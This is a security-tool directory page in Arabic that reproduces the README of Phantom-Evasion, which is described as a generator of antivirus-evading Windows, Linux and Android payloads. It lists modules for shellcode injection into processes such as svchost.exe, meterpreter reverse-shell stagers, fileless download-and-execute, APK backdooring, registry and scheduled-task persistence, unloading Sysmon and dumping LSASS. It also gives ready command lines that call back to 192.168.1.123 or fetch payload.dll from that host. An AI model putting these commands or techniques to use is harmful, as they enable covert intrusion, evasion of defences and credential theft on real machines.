Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Phantom-Evasion — أداة تفادي برامج مكافحة الفيروسات المكتوبة بلغة بايثون | Kitploit
أدوات/GitHubGitHub/oddcod3/phantom-evasion
تصعيد الامتيازاتالتحليل الديناميكي (عزل)أطر الاستغلالتوليد الحمولةآليات الاستمراريةشيل كودما بعد الاستغلالتوليد شيفرة القشرةتطوير الحمولاتArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k340منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة تفادي برامج مكافحة الفيروسات المكتوبة بلغة بايثون

عرض المستودع

PHANTOM EVASION 3.0

Phantom-Evasion هي أداة لتجنب برامج مكافحة الفيروسات مكتوبة بلغة بايثون (متوافقة مع بايثون و بايثون3) قادرة على إنشاء ملفات تنفيذية غير قابلة للكشف (تقريبًا) حتى مع أكثر حمولات msfvenom شيوعًا x86.

أنظمة التشغيل التالية تدعم الإعداد التلقائي رسميًا:

  1. Kali Linux
  2. Parrot Security

أنظمة التشغيل التالية تدعم الإعداد التلقائي على الأرجح ولكنها تتطلب تثبيت metasploit-framework يدويًا:

  1. OSX (تم اختباره على Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. توزيعات Debian الأخرى
  7. Centos
  8. Fedora
  9. Blackarch

أنظمة التشغيل التالية تتطلب إعدادًا يدويًا:

  1. Windows 10

ببساطة قم باستنساخ (git clone) أو تنزيل وفك ضغط مجلد Phantom-Evasion

الإعداد:

الإعداد التلقائي، افتح محطة (terminal) ونفذ:

root@kitploit:~
python3 phantom-evasion.py --setup

أو:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

أو ابدأ Phantom-Evasion في الوضع التفاعلي واختر الخيار 7

التبعيات (للإعداد اليدوي فقط)

  1. metasploit-framework
  2. mingw-w64 (cygwin على ويندوز)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

وضع سطر الأوامر / التفاعلي:

  1. تشغيل Phantom-Evasion في الوضع التفاعلي:
root@kitploit:~
python3 phantom-evasion.py

أو:

root@kitploit:~
./phantom-evasion.py
  1. وإلا لعرض خيارات وضع سطر الأوامر:
root@kitploit:~
python3 phantom-evasion.py --help

أو:

root@kitploit:~
./phantom-evasion.py --help

وحدات ويندوز

  • كل وحدة C لحمولة ويندوز يمكن تجميعها (تدعم كلاً من x86 و x64) كـ EXE أو DLL/ReflectiveDLL.

  • إدخال تعليمات برمجية عشوائية غير مفيدة (junkcode) (يمكن ضبط الشدة والتكرار واحتمالية إعادة الإدخال) وتقنيات تجنب برامج مكافحة الفيروسات لويندوز (يمكن ضبط التكرار).

  • تشفير متعدد البايت Xor/Vigenere للشفرة أو الملف مدعوم في كلا وحدتي حقن الشفرة (Shellcode injection) وتنفيذ التحميل (Download Exec).

  • تقنية Ntdll unhookapi و Peb process masquerading مدعومة.

  • مجموعة واسعة من أوضاع التنفيذ مدعومة (محلية وبعيدة).

  • مجموعة واسعة من أوضاع تخصيص الذاكرة للحمولة (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

  • التحميل الديناميكي لواجهة برمجة تطبيقات ويندوز يمكن ضبطه.

  • مزيف التوقيعات (Certificate spoofer) والموقع (signer) مدعوم.

  • إزالة الرموز من الملفات التنفيذية (strip) (https://en.wikipedia.org/wiki/Strip_(Unix))

حقن شفرة C لويندوز (Shellcode Injection)

حمولات ويندوز msfvenom والشفرة المخصصة مدعومة. يمكن تخزين الشفرة كمورد واسترجاعها في وقت التشغيل باستخدام واجهة برمجة تطبيقات FindResource.

تشفير الشفرة مدعوم:

root@kitploit:~
1. لا شيء (none)

2. Multibyte-Xor

3. Double-key Multibyte-Xor

4. Vigenere

5. Double-key Vigenere
  1. طريقة التنفيذ المحلية يمكن أن تكون واحدة من التالية:

    Thread (خيط)

    APC (استدعاء إجراء غير متزامن)

    ووضع تخصيص الذاكرة المحلي يمكن أن يكون واحداً من التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. طريقة التنفيذ عن بعد يمكن أن تكون واحدة من التالية:

    ThreadExecutionHijack (اختصاراً TEH)

    ProcessInject (اختصاراً PI)

    APCSpray (اختصاراً APCS)

    EarlyBird (اختصاراً EB)

    EntryPointHijack (اختصاراً EPH)

    ووضع تخصيص الذاكرة عن بعد يمكن أن يكون واحداً من التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

مُشغِّل (stager) متربرتر C خالص لويندوز (C)

وحدات مُشغِّل متربرتر C خالص (TCP/HTTP/HTTPS) متوافقة مع msfconsole و beacon لـ Cobalt Strike. (reverse_tcp/reverse_http/reverse_https)

باستخدام وضع سطر الأوامر:

root@kitploit:~
مُشغِّل stager reverse_tcp C هو WRT

مُشغِّل stager reverse_http C هو WRH

مُشغِّل stager reverse_https C هو WRS
  1. طريقة التنفيذ المحلية يمكن أن تكون واحدة من التالية:

    Thread (خيط)

    APC (استدعاء إجراء غير متزامن)

    ووضع تخصيص الذاكرة المحلي يمكن أن يكون واحداً من التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

تنفيذ تحميل C لويندوز بدون كتابة على القرص (Download-Exec NoDiskWrite)

تحميل ملف exe/dll من عنوان URL معطى في الذاكرة وتنفيذه/تحميله في عملية بعيدة (دون الكتابة على القرص).

تحميل EXE/DLL مشفر مدعوم:

root@kitploit:~
1. لا شيء (none)
                                 
2. Multibyte-Xor
                                 
3. Double-key Multibyte-Xor
                               
4. Vigenere
                                
5. Double-key Vigenere

سيتم حفظ DLL/EXE المشفر كـ اسم الملف الأصلي + "crypt" + ".dll" أو ".exe" وهذا هو الذي سيتم تحميله

  1. Windows DownloadExecExe NoDiskWrite (WDE في وضع سطر الأوامر):

    طريقة التنفيذ عن بعد يمكن أن تكون واحدة من التالية:

    ProcessHollowing (اختصاراً PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD في وضع سطر الأوامر):

    طريقة التحميل عن بعد يمكن أن تكون واحدة من التالية:

    ReflectiveDll (اختصاراً RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (اختصاراً MM) ---> فقط x86

حمولات لينكس

وحدة حقن شفرة لينكس (C)

حمولات لينكس msfvenom والشفرة المخصصة مدعومة.

حمولات أندرويد

  1. باب خلفي مشفر لـ Msfvenom أندرويد:

    تشفير حمولات msfvenom وإعادة بنائها (smali/baksmali) باستخدام apktool. يمكن استخدام الحمولة المشفرة لإنشاء باب خلفي في ملفات apk غير ضارة.

وحدات الثبات (Persistence)

  1. Windows Persistence RegCreateKeyExW Add Registry Key (C) يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه مع تحديد المسار الكامل للملف المراد إضافته لبدء التشغيل كوسيط.

  2. Windows Persistence REG Add Registry Key (CMD) تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (إضافة مفتاح تسجيل عبر REG.exe).

  3. Windows Persistence Keep Process Alive (C) يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه. يستخدم CreateToolSnapshoot و ProcessFirst و ProcessNext للتحقق مما إذا كانت العملية المحددة حية كل X ثانية (إذا لم تكن، يتم إنشاء عملية جديدة باستخدام واجهة برمجة تطبيقات WinExec).

  4. Windows Persistence Schtasks (CMD)

    تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (باستخدام Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (باستخدام sc.exe).

وحدات رفع الامتيازات (Privilege Escalation)

  1. Windows DuplicateTokenEx (C)

    إنشاء عملية جديدة برمز مميز مستنسخ من عملية أخرى. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه.

وحدات ما بعد الاستغلال (Postexploitation)

  1. Windows Unload Sysmon (C) إلغاء تحميل برنامج تشغيل sysmon مما يؤدي إلى توقف النظام عن تسجيل سجلات أحداث sysmon. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه.

  2. Windows Unload Sysmon (CMD) إلغاء تحميل برنامج تشغيل sysmon مما يؤدي إلى توقف النظام عن تسجيل سجلات أحداث sysmon.

  3. Windows Attrib hide file (CMD) استخدام attrib لإخفاء الملف

  4. Windows SetFileAttribute hidden (C) إخفاء الملف باستخدام واجهة برمجة تطبيقات SetFileAttribute. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه.

  5. Windows DumpLsass (C) تفريغ Lsass باستخدام واجهة برمجة تطبيقات MiniWriteDumpWrite. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتنفيذه.

  6. Windows DumpLsass (CMD)

    تفريغ Lsass من سطر الأوامر.

أمثلة على وضع سطر الأوامر لـ Phantom-Evasion:

  1. حقن شفرة ويندوز، إخراج exe موقع بشهادة https مزيفة، طريقة تنفيذ محلية: Thread، الذاكرة: Virtual_RWX، التشفير: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. حقن شفرة ويندوز x64، إخراج كـ dll عاكس (reflective dll)، طريقة تنفيذ عن بعد: ProcessInject (PI)، الذاكرة: Virtual_RW/RX، العملية المستهدفة: SkypeApp.exe، التشفير: double key xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. حقن شفرة ويندوز x64، إخراج كـ dll منزوعة الرموز (stripped dll)، الشفرة مخزنة كمورد، طريقة تنفيذ عن بعد: EarlyBird (EB)، الذاكرة: Virtual_RW/RX، العملية المستهدفة: svchost.exe، التشفير: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. مشغِّل stager reverse https لويندوز x64، إخراج كـ dll منزوعة الرموز، طريقة تنفيذ محلية: Thread، الذاكرة: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. ويندوز x86 downloadexec dll، إخراج كـ exe منزوع الرموز، طريقة تنفيذ عن بعد: ManualMap (MM)، العملية المستهدفة: OneDrive.exe، حجم التحميل 1000000 بايت
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. ويندوز x64 downloadexec exe، إخراج كـ dll عاكس منزوع الرموز، طريقة تنفيذ عن بعد: ProcessHollowing (PH)، العملية المستهدفة: svchost.exe، حجم التحميل 1000000 بايت
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

الترخيص

GPLv3.0

الإشادات والموارد المفيدة

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

تنزيل الأداة